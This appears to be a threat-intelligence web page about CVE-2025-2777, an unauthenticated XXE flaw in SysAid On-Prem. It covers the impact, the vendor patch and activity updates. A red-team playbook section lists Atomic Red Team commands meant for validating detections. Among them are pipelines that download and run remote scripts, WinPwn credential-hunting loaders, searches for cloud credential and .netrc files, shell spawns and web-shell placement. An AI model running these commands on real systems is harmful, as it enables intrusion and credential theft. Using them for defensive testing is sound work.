CVE-2025-2777
Overview
This vulnerability is an unauthenticated XML External Entity (XXE) injection affecting the lshw processing functionality in SysAid On-Prem. The root cause lies in improper XML input handling where external entities are processed without validation, enabling malicious XML payloads to be parsed. The affected component is the lshw XML parser within SysAid On-Prem versions up to 23.3.40.
Vulnerability Description
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
Impact
An unauthenticated attacker can exploit this XXE vulnerability to read sensitive files on the server and gain administrative control over the SysAid On-Prem installation. No user interaction or prior authentication is required (AV:N/AC:L/PR:N/UI:N), enabling remote takeover of the administrator account and potential lateral movement within the network. This can lead to full compromise of the affected system and exposure of confidential data.
Solution
SysAid has released patches addressing this vulnerability in versions starting from 24.40.60 as detailed in their official advisory: https://documentation.sysaid.com/docs/24-40-60. Users should upgrade SysAid On-Prem installations to version 24.40.60 or later immediately. No alternative workarounds are specified; applying the vendor-provided update is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SysAid On-Prem versions up to 23.3.40 is characterized as an unauthenticated XML External Entity (XXE) vulnerability, specifically within the lshw processing functionality. This type of vulnerability arises when an application parses XML input from untrusted sources without proper validation. In this case, the application fails to adequately restrict the processing of external entities, allowing attackers to craft malicious XML payloads that can lead to unauthorized access to sensitive data or system resources. The exploitation of this vulnerability can result in severe consequences, including the potential for an attacker to gain administrative privileges, thereby compromising the integrity and confidentiality of the system.
Attack vectors for this vulnerability are particularly concerning due to their simplicity and effectiveness. An attacker could exploit the vulnerability by submitting a specially crafted XML request to the affected application. This request could include references to external entities that, when processed, could lead to the disclosure of sensitive files on the server or even execute arbitrary commands. Furthermore, the lack of authentication requirements means that attackers do not need to possess any valid credentials to initiate an attack, significantly lowering the barrier to entry. Scenarios could range from a targeted attack against a specific organization to broader exploitation attempts, where attackers leverage automated tools to scan for vulnerable instances of SysAid.
The real-world impact of this vulnerability is profound, particularly for organizations relying on SysAid for IT service management. The potential for administrator account takeover poses a significant business risk, as it could allow attackers to manipulate system configurations, access confidential data, and disrupt critical services. The ramifications of such an attack could extend beyond immediate data loss or system downtime, potentially leading to regulatory fines, reputational damage, and loss of customer trust. Organizations in regulated industries, such as finance or healthcare, may face additional scrutiny and penalties if sensitive data is compromised due to this vulnerability.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, it is crucial to update to the latest version of SysAid that addresses this vulnerability. Regular patch management practices should be enforced to ensure that all software components are kept up to date. Additionally, organizations should employ web application firewalls (WAFs) to filter and monitor incoming XML requests, blocking any that exhibit suspicious patterns indicative of XXE attacks. Security teams should also conduct regular security assessments and penetration testing to identify and remediate potential vulnerabilities within their systems proactively.
In conclusion, the unauthenticated XML External Entity vulnerability in SysAid On-Prem versions poses a significant threat to organizations that utilize this software. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention from cybersecurity professionals. By adopting robust detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ultimately enhancing their overall security posture.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-2777, with our telemetry indicating new exploitation attempts targeting SysAid On-Prem versions vulnerable to unauthenticated XML External Entity (XXE) attacks. Although the overall exploit landscape remains unchanged with no new public exploit details, the emergence of these recent triggers suggests adversaries are actively probing or attempting to leverage this vulnerability in operational environments. This development elevates the immediacy of the threat, as the vulnerability’s critical severity combined with evidence of active reconnaissance or exploitation attempts increases the risk of administrator account compromise and unauthorized data access. While the EPSS score remains stable, the uptick in detection signals a growing adversary interest that defenders must consider when prioritizing monitoring and response efforts. Consequently, the threat level associated with CVE-2025-2777 should be reassessed to reflect this increased activity, underscoring the need for heightened vigilance despite the absence of newly disclosed exploit code.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-2777, indicating increased adversary engagement targeting the vulnerable SysAid On-Prem versions. While the EPSS score remains stable, the qualitative surge in telemetry suggests that threat actors are intensifying reconnaissance or initial exploitation attempts, potentially probing for opportunities to leverage the unauthenticated XXE flaw for administrator account compromise. This heightened activity underscores a growing operational interest that could precede more sophisticated or widespread exploitation campaigns. For defenders, this evolving pattern elevates the urgency of continuous monitoring and rapid incident response, as the critical severity of the vulnerability combined with active targeting significantly raises the risk profile. Consequently, the threat level associated with CVE-2025-2777 should be considered elevated, reflecting a transition from theoretical risk to a more imminent and actionable threat environment.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sysaid | Sysaid | All |
cpe:2.3:a:sysaid:sysaid:*:*:*:*:on-premises:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-221 | Data Serialization External Entities Blowup |
34%
|
— | — |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-2777 |
| documentation.sysaid.com |
GitHub CVE
vendor-advisory
|
https://documentation.sysaid.com/docs/24-40-60 |
| labs.watchtowr.com |
GitHub CVE
exploit
|
https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ |